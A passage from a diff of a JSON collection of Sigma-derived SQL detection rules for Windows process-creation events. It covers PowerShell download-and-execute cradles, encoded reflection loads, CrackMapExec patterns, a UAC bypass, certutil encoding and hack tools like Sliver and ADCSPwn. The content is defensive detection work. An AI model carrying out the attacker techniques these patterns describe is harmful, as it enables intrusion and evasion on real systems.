ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_register_app.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Obfuscated IP Via CLI", - "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", - "status": "experimental", - "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) 
via commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "status": "test", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.discovery" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Suspicious Copy From or To System32", + "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "status": "test", + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location 
with a different name in order to bypass detections based on locations\n", + "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1528", + "attack.defense_evasion", "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_susp_copy_system32.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", "status": "experimental", - "description": "Detects suspicious sub processes started 
by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName 
LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", - "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "status": "test", + "description": "Detects commands that temporarily turn off Volume Snapshots", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d 
Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", + "status": "experimental", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "SQL Client Tools PowerShell Session Detection", - "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "title": "Potential Network Sniffing Activity Using Network Tools", + "id": 
"ba1f7802-adc7-48b4-9ecb-81e227fddfd5", "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.communitly", + "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" + "attack.credential_access", + "attack.discovery", + "attack.t1040" ], "falsepositives": [ - "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." 
+ "Legitimate administration activity to troubleshoot network issues" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\windump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" + "filename": "proc_creation_win_network_sniffing.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine 
LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "title": "Renamed FTP.EXE Execution", + "id": "277a4393-446c-449a-b0ed-7fdc7795244c", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "medium", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'ftp.exe' AND NOT (NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_renamed_ftp.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", + "title": "Detected Windows Software Discovery", + "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Legitimate administration activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_reg_software_discovery.yml" }, { - "title": "Potential Recon Activity Using Wevtutil", - "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", - "status": "experimental", - "description": "Detects usage of the wevtutil utility to perform reconnaissance", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "InfDefaultInstall.exe .inf Execution", + "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "status": "test", + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", + "author": "frack113", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of the utility by administrators to query the event log" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = 
'4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wevtutil_recon.yml" + "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" }, { - "title": "Always Install Elevated Windows Installer", - "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "title": "Potential Suspicious Registry File Imported Via Reg.EXE", + "id": "62e0298b-e994-4189-bc87-bc699aa62d97", "status": "experimental", - "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "System administrator usage", - "Anti virus products" + "Legitimate import of keys" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%msi%' ESCAPE '\\' AND NewProcessName LIKE '%tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' 
ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" + "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" }, { - "title": "Unusual Parent Process For Cmd.EXE", - "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", - "status": "experimental", - "description": "Detects suspicious parent process for cmd.exe", - "author": "Tim Rauch", + "title": "Potential Defense Evasion Via Binary Rename", + "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "status": "test", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + 
"author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND 
Channel = 'Security') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_unusual_parent.yml" + "filename": "proc_creation_win_renamed_binary.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Scripts or tools that download files and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE 
'%Unrestricted%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" - }, - { - "title": "File Encoded To Base64 Via Certutil.EXE", - "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", - "status": "test", - "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' 